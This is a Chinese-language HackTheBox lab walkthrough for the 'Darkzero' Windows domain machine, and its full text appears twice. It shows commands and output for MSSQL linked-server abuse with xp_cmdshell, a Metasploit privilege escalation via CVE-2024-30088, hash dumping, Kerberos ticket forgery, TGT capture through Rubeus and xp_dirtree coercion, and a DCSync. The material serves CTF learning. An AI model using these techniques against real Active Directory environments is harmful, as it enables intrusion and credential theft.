HackTheBox Darkzero Writeup
HackTheBox Darkzero 是一台困难难度的 Windows 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 或域权限的利用链。
htb darkzero
枚举
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
# Nmap 7.98 scan initiated Sat Mar 28 06:41:15 2026 as: /usr/lib/nmap/nmap -sC -sV -T4 -oN nmap_result.txt -p- 10.129.9.233
Nmap scan report for 10.129.9.233
Host is up (0.27s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-28 06:48:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.9.233:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-28T06:22:44
|_Not valid after: 2056-03-28T06:22:44
| ms-sql-info:
| 10.129.9.233:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2026-03-28T06:49:55+00:00; 0s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49895/tcp open msrpc Microsoft Windows RPC
49926/tcp open msrpc Microsoft Windows RPC
50344/tcp open msrpc Microsoft Windows RPC
58507/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/28%Time=69C779B9%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-28T06:49:16
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 06:49:58 2026 -- 1 IP address (1 host up) scanned in 523.23 seconds
MSSQL
枚举发现链接服务器
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
# darkzero-ext\svc_sql
最后通过msfconsole可以获得meterpreter
进入后枚举发现该机器居然没有打任何补丁
C:\Windows\system32>systeminfo
systeminfo
Host Name: DC02
OS Name: Microsoft Windows Server 2022 Datacenter
OS Version: 10.0.20348 N/A Build 20348
Hotfix(s): N/A
使用exploit/windows/local/cve_2024_30088_authz_basep提升权限
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:7b0e719ff0de15e5072e9ce7f5d42030:::
Trust Key
关于 Trust Key 伪造票据
这个操作需要几个信息:
darkzero$的 NTLM hash ✓ 有了- darkzero.ext 域的 SID
- darkzero.htb 域的 SID
- krbtgt 的 hash(darkzero.ext 的)✓ 有了
impacket-lookupsid darkzero/john.w@10.129.13.228
# [*] Domain SID is: S-1-5-21-1152179935-589108180-1989892463
PS C:\Windows\system32> (Get-ADDomain).DomainSID.Value
S-1-5-21-1969715525-31638512-2552845157
➜ DarkZero impacket-ticketer -nthash 7b0e719ff0de15e5072e9ce7f5d42030\
-domain-sid S-1-5-21-1969715525-31638512-2552845157 \
-domain darkzero.ext \
-extra-sid S-1-5-21-1152179935-589108180-1989892463-519 \
Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkzero.ext/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
➜ DarkZero export KRB5CCNAME=Administrator.ccache
➜ DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
➜ DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] unpack requires a buffer of 4 bytes
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
失败了,说明DC01上存储的信任用户不是darkzero$
枚举域信任
PS C:\Windows\system32> Get-ADTrust -Filter *
Get-ADTrust -Filter *
Direction : BiDirectional # 双向信任,两边都能互访。
DisallowTransivity : False
DistinguishedName : CN=darkzero.htb,CN=System,DC=darkzero,DC=ext
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : darkzero.htb
ObjectClass : trustedDomain
ObjectGUID : 700b5e64-8ae9-4528-a968-26e2b4a44509
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=darkzero,DC=ext
Target : darkzero.htb
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False # 不用 RC4,用 AES。
我们在DC02启动监听
Rubeus.exe monitor /interval:1 /nowrap
使用mssql进入DC01进行smb访问
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\a
subdirectory depth file
------------ ----- ----
即可得到:

# 先把 base64 转成 kirbi
base64 -d DC01.txt > DC01.kirbi
# 再用 impacket 转成 ccache
impacket-ticketConverter DC01.kirbi DC01.ccache
# 导入并验证
export KRB5CCNAME=DC01.ccache
klist
impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc
即可获取administrator的ntlm
总结
官方凭据 john.w
→ DC01 MSSQL 登录
→ 枚举链接服务器,发现 DC02.darkzero.ext
→ 链接服务器启用 xp_cmdshell
→ 上传 rcat.exe,获得 DC02 meterpreter (svc_sql)
→ systeminfo 发现无补丁 + CVE-2024-30088 提权到 SYSTEM
→ Rubeus monitor 以 SYSTEM 运行监听票据
→ DC01 MSSQL 执行 xp_dirtree \\DC02\a 触发 Kerberos 认证
→ Rubeus 捕获 DC01$@DARKZERO.HTB 的 TGT
→ base64 解码 → kirbi → ccache 转换
→ secretsdump DCSync dump DC01 所有 hash
→ Administrator PTH 拿 DC01 shell HTB darkzero
枚举
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
# Nmap 7.98 scan initiated Sat Mar 28 06:41:15 2026 as: /usr/lib/nmap/nmap -sC -sV -T4 -oN nmap_result.txt -p- 10.129.9.233
Nmap scan report for 10.129.9.233
Host is up (0.27s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-28 06:48:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.9.233:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-28T06:22:44
|_Not valid after: 2056-03-28T06:22:44
| ms-sql-info:
| 10.129.9.233:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2026-03-28T06:49:55+00:00; 0s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49895/tcp open msrpc Microsoft Windows RPC
49926/tcp open msrpc Microsoft Windows RPC
50344/tcp open msrpc Microsoft Windows RPC
58507/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/28%Time=69C779B9%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-28T06:49:16
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 06:49:58 2026 -- 1 IP address (1 host up) scanned in 523.23 seconds
MSSQL
枚举发现链接服务器
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
# darkzero-ext\svc_sql
最后通过msfconsole可以获得meterpreter
进入后枚举发现该机器居然没有打任何补丁
C:\Windows\system32>systeminfo
systeminfo
Host Name: DC02
OS Name: Microsoft Windows Server 2022 Datacenter
OS Version: 10.0.20348 N/A Build 20348
Hotfix(s): N/A
使用exploit/windows/local/cve_2024_30088_authz_basep提升权限
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:7b0e719ff0de15e5072e9ce7f5d42030:::
Trust Key
关于 Trust Key 伪造票据
这个操作需要几个信息:
darkzero$的 NTLM hash ✓ 有了- darkzero.ext 域的 SID
- darkzero.htb 域的 SID
- krbtgt 的 hash(darkzero.ext 的)✓ 有了
impacket-lookupsid darkzero/john.w@10.129.13.228
# [*] Domain SID is: S-1-5-21-1152179935-589108180-1989892463
PS C:\Windows\system32> (Get-ADDomain).DomainSID.Value
S-1-5-21-1969715525-31638512-2552845157
➜ DarkZero impacket-ticketer -nthash 7b0e719ff0de15e5072e9ce7f5d42030\
-domain-sid S-1-5-21-1969715525-31638512-2552845157 \
-domain darkzero.ext \
-extra-sid S-1-5-21-1152179935-589108180-1989892463-519 \
Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkzero.ext/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
➜ DarkZero export KRB5CCNAME=Administrator.ccache
➜ DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
➜ DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] unpack requires a buffer of 4 bytes
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
失败了,说明DC01上存储的信任用户不是darkzero$
枚举域信任
PS C:\Windows\system32> Get-ADTrust -Filter *
Get-ADTrust -Filter *
Direction : BiDirectional # 双向信任,两边都能互访。
DisallowTransivity : False
DistinguishedName : CN=darkzero.htb,CN=System,DC=darkzero,DC=ext
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : darkzero.htb
ObjectClass : trustedDomain
ObjectGUID : 700b5e64-8ae9-4528-a968-26e2b4a44509
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=darkzero,DC=ext
Target : darkzero.htb
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False # 不用 RC4,用 AES。
我们在DC02启动监听
Rubeus.exe monitor /interval:1 /nowrap
使用mssql进入DC01进行smb访问
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\a
subdirectory depth file
------------ ----- ----
即可得到:

# 先把 base64 转成 kirbi
base64 -d DC01.txt > DC01.kirbi
# 再用 impacket 转成 ccache
impacket-ticketConverter DC01.kirbi DC01.ccache
# 导入并验证
export KRB5CCNAME=DC01.ccache
klist
impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc
即可获取administrator的ntlm
总结
官方凭据 john.w
→ DC01 MSSQL 登录
→ 枚举链接服务器,发现 DC02.darkzero.ext
→ 链接服务器启用 xp_cmdshell
→ 上传 rcat.exe,获得 DC02 meterpreter (svc_sql)
→ systeminfo 发现无补丁 + CVE-2024-30088 提权到 SYSTEM
→ Rubeus monitor 以 SYSTEM 运行监听票据
→ DC01 MSSQL 执行 xp_dirtree \\DC02\a 触发 Kerberos 认证
→ Rubeus 捕获 DC01$@DARKZERO.HTB 的 TGT
→ base64 解码 → kirbi → ccache 转换
→ secretsdump DCSync dump DC01 所有 hash
→ Administrator PTH 拿 DC01 shell